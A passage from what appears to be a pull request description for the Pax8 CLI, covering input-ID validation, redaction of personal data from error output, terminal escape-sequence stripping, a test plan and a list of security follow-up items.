- **`SAFE_ID_RE = /^[A-Za-z0-9_-]{1,128}$/`** intentionally accepts both Pax8 UUIDs and the `prod-…` test/demo ID shape without admitting whitespace, quotes, or shell metacharacters. Strict-UUID would have broken demo / test fixtures.
- **`#458` carry-along in commit 1.** `idempotency.ts` carries 3 lines of in-flight `getConfigDir` + `safeWriteFileSync` hardening that were staged on this branch alongside the `debugLog` conversion. The companion regression gate `local-state-writers.test.ts` is separate WIP and not in this PR.

## Test plan

- [x] New `packages/cli/src/__tests__/error-output-redaction.test.ts` — `--json` and human stderr both scrub a PII-shaped positional arg
- [x] New `packages/cli/src/lib/output-controls.test.ts` — OSC title-set, CSI clear/cursor, SGR, C0 bytes, lone-ESC, idempotence
- [x] New cases in `packages/core/src/services/recommendations.test.ts` — `orderCommand` uses `companyId` not name; unsafe company ID / product ID collapses the command to `null`
- [x] Targeted suite (257 tests across redactor / output / errors / recommendations / orders / report-bug / table-output / idempotency / dashboard / core API client) — green
- [ ] Manual: run a failing `companies show <name-containing-uuid>` against a real partner tenant and confirm the UUID no longer appears in stderr
- [ ] Manual: in a TTY, render `subscriptions list --json` for a tenant whose product names contain ANSI sequences and confirm the table doesn't rewrite the terminal title

## Out of scope (follow-ups, each its own branch)

- **H-4** — SHA-pin `release.yml` GitHub Actions (supply chain — the npm-publish workflow carries `contents: write` + OIDC).
- **H-5** — Preserve `confirmDestructive`'s keyword challenge under `--yes` / `PAX8_YES=1`; add `~/.pax8/write-audit.log` independent of telemetry opt-in.
- **M-1** — Validate `--month` against `/^\d{4}-\d{2}$/` before it interpolates into `nextActions.command` strings.
- **M-2** — Bucket telemetry order-revenue fields; emit a `command_executed { success: false, cancelled: true }` event on SIGINT before `flushAndShutdown`.
- **M-4** — `pnpm audit --audit-level high` in CI (currently informational).
- **M-5** — Route `PAX8_IDEMPOTENCY_DIR` / `PAX8_DISPUTES_DIR` through `validateConfigDir` or refuse to honor them when `NODE_ENV !== "test"`.